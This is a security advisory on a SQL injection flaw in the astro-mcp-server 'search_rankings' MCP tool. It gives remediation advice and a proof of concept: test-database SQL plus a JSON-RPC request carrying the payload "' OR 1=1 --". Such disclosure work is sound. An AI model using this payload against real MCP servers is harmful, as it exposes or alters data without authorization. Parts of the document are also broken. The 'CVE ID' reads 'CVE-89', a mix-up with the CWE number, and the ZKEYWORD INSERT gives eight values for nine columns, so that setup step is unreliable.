# SQL Injection Vulnerability Summary (astro-mcp-server) ## Vulnerability Overview * **Vulnerability Name**: SQL Injection Vulnerability in astro-mcp-server * **CVE ID**: CVE-89 (CWE-89: SQL Injection) * **Severity**: High (CVSS v3.1 Score: 7.6) * **Description**: A SQL injection vulnerability exists in the file `src/index.ts` of `astro-mcp-server` version 1.1.1. Multiple MCP tools (e.g., `search_rankings`) directly concatenate user-controllable parameters (such as `keyword`, `store`, `appname`) into SQLite query strings without any filtering or escaping. An attacker can read database data or modify database state by crafting malicious parameters. ## Impact Scope * **Affected Version**: 1.1.1 * **Affected Component**: `src/index.ts` * **Attack Prerequisites**: 1. The attacker can invoke the MCP server tool. 2. The server can read the expected Astro ASO SQLite database. 3. The affected tool receives string parameters controlled by the attacker. ## Remediation Measures 1. **Parameterized Queries**: Use prepared statements and bound parameters instead of string concatenation. 2. **Input Validation**: Enforce strict input pattern validation for string and numeric parameters. 3. **Numeric Limits**: Validate and restrict numeric parameters such as `limit`, `threshold`, `minPopularity`, `maxDifficulty`. 4. **Regression Testing**: Add test cases to ensure SQL meta-characters are treated as data rather than executable code. ## POC Code (Proof of Concept) **1. Prepare Test Database (SQLite)** ```sql CREATE TABLE ZAPPLICATION ( Z_PK INTEGER, ZNAME TEXT, ZAPPID TEXT, ZDEVELOPER TEXT, ZPLATFORM TEXT, ZLASTUPDATEDTIMESTAMP REAL ); CREATE TABLE ZKEYWORD ( ZAPPLICATION INTEGER, ZTEXT TEXT, ZCURRENTTRAINING INTEGER, ZPREDICTEDRANKING INTEGER, ZDIFFICULTY INTEGER, ZPOPULARITY INTEGER, ZSTORE TEXT, ZLASTUPDATE REAL, ZAPPCOUNT INTEGER ); INSERT INTO ZAPPLICATION VALUES (1, 'Legit App', 'com.example.legit', 'dev', 'ios', 0); INSERT INTO ZKEYWORD VALUES (1, 'safe', 10, 20, 30, 40, 'US', 100); ``` **2. Start MCP Server** ```bash Command: node Arguments: dist/index.js Environment: {"HOME":"/ASTRO_TEST_HOME"} ``` **3. Send Malicious Request (JSON-RPC)** ```json { "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "search_rankings", "arguments": { "keyword": "' OR 1=1 --", "store": "US", "appname": "Legit App", "limit": 10, "threshold": 0, "minPopularity": 0, "maxDifficulty": 100 } } } ``` **4. Verification** * Send the above request via MCP Inspector or client. * Confirm that the response contains injected data (e.g., all records of `Legit App`), proving successful SQL injection.